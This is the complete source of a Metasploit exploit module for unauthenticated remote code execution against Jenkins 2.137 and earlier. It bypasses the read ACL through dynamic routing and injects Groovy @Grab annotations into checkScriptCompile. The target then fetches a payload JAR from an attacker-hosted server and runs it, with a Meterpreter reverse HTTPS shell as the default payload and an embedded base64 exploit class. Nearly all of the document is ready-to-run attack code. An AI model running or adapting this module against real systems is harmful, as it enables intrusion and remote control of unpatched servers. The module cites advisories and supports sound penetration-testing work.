Jenkins ACL Bypass / Metaprogramming Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',  
'Description' => %q{  
This module exploits a vulnerability in Jenkins dynamic routing to  
bypass the Overall/Read ACL and leverage Groovy metaprogramming to  
download and execute a malicious JAR file.  
  
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work  
on later versions of Jenkins.  
  
Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.  
},  
'Author' => [  
'Orange Tsai', # Discovery and PoC  
'wvu' # Metasploit module  
],  
'References' => [  
['CVE', '2019-1003000'], # Script Security  
['CVE', '2019-1003001'], # Pipeline: Groovy  
['CVE', '2019-1003002'], # Pipeline: Declarative  
['EDB', '46427'],  
['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],  
['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],  
['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],  
['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']  
],  
'DisclosureDate' => '2019-01-08', # Public disclosure  
'License' => MSF_LICENSE,  
'Platform' => 'java',  
'Arch' => ARCH_JAVA,  
'Privileged' => false,  
'Targets' => [  
['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',  
'Version' => Gem::Version.new('2.137')  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],  
'Reliability' => [REPEATABLE_SESSION]  
},  
'Stance' => Stance::Aggressive # Be aggressive, b-e aggressive!  
))  
  
register_options([  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])  
])  
  
register_advanced_options([  
OptBool.new('ForceExploit', [false, 'Override check result', false])  
])  
  
deregister_options('URIPATH')  
end  
  
=begin  
http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]  
=end  
def check  
checkcode = CheckCode::Safe  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => go_go_gadget1('/search/index'),  
'vars_get' => {'q' => 'a'}  
)  
  
unless res && (version = res.headers['X-Jenkins'])  
vprint_error('Jenkins not detected')  
return CheckCode::Unknown  
end  
  
vprint_status("Jenkins #{version} detected")  
checkcode = CheckCode::Detected  
  
if Gem::Version.new(version) > target['Version']  
vprint_error("Jenkins #{version} is not a supported target")  
return CheckCode::Safe  
end  
  
vprint_good("Jenkins #{version} is a supported target")  
checkcode = CheckCode::Appears  
  
if res.body.include?('Administrator')  
vprint_good('ACL bypass successful')  
checkcode = CheckCode::Vulnerable  
else  
vprint_error('ACL bypass unsuccessful')  
return CheckCode::Safe  
end  
  
checkcode  
end  
  
def exploit  
unless check == CheckCode::Vulnerable || datastore['ForceExploit']  
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')  
end  
  
# NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS  
# HACK: Both HttpClient and HttpServer use datastore['SSL']  
ssl = datastore['SSL']  
datastore['SSL'] = false  
start_service('Path' => '/')  
datastore['SSL'] = ssl  
  
print_status('Sending Jenkins and Groovy go-go-gadgets')  
send_request_cgi(  
'method' => 'GET',  
'uri' => go_go_gadget1,  
'vars_get' => {'value' => go_go_gadget2}  
)  
end  
  
#  
# Exploit methods  
#  
  
=begin  
http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword  
?apiUrl=http://169.254.169.254/%23  
&login=orange  
&password=tsai  
=end  
def go_go_gadget1(custom_uri = nil)  
# NOTE: See CVE-2018-1000408 for why we don't want to randomize the username  
acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')  
  
return normalize_uri(acl_bypass, custom_uri) if custom_uri  
  
normalize_uri(  
acl_bypass,  
'/descriptorByName',  
'/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'  
)  
end  
  
=begin  
http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile  
?value=  
@GrabConfig(disableChecksums=true)%0a  
@GrabResolver(name='orange.tw', root='http://[your_host]/')%0a  
@Grab(group='tw.orange', module='poc', version='1')%0a  
import Orange;  
=end  
def go_go_gadget2  
(  
<<~EOF  
@GrabConfig(disableChecksums=true)  
@GrabResolver('http://#{srvhost_addr}:#{srvport}/')  
@Grab('#{vendor}:#{app}:#{version}')  
import #{app}  
EOF  
).strip  
end  
  
#  
# Payload methods  
#  
  
#  
# If you deviate from the following sequence, you will suffer!  
#  
# HEAD /path/to/pom.xml -> 404  
# HEAD /path/to/payload.jar -> 200  
# GET /path/to/payload.jar -> 200  
#  
def on_request_uri(cli, request)  
vprint_status("#{request.method} #{request.uri} requested")  
  
unless %w[HEAD GET].include?(request.method)  
vprint_error("Ignoring #{request.method} request")  
return  
end  
  
if request.method == 'HEAD'  
if request.uri != payload_uri  
vprint_error('Sending 404')  
return send_not_found(cli)  
end  
  
vprint_good('Sending 200')  
return send_response(cli, '')  
end  
  
if request.uri != payload_uri  
vprint_error('Sending bogus file')  
return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")  
end  
  
vprint_good('Sending payload JAR')  
send_response(  
cli,  
payload_jar,  
'Content-Type' => 'application/java-archive'  
)  
  
# XXX: $HOME may not work in some cases  
register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")  
end  
  
def payload_jar  
jar = payload.encoded_jar  
  
jar.add_file("#{app}.class", exploit_class)  
jar.add_file(  
'META-INF/services/org.codehaus.groovy.plugins.Runners',  
"#{app}\n"  
)  
  
jar.pack  
end  
  
=begin javac Exploit.java  
import metasploit.Payload;  
  
public class Exploit {  
public Exploit(){  
try {  
Payload.main(null);  
} catch (Exception e) { }  
  
}  
}  
=end  
def exploit_class  
klass = Rex::Text.decode_base64(  
<<~EOF  
yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB  
AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq  
YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl  
Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n  
L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q  
twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL  
AAAA  
EOF  
)  
  
# Replace length-prefixed string "Exploit" with a random one  
klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")  
end  
  
#  
# Utility methods  
#  
  
def payload_uri  
"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"  
end  
  
def vendor  
@vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join  
end  
  
def app  
@app ||= Faker::App.name.split(/[^[:alpha:]]/).join  
end  
  
def version  
@version ||= Faker::App.semantic_version  
end  
  
end  
`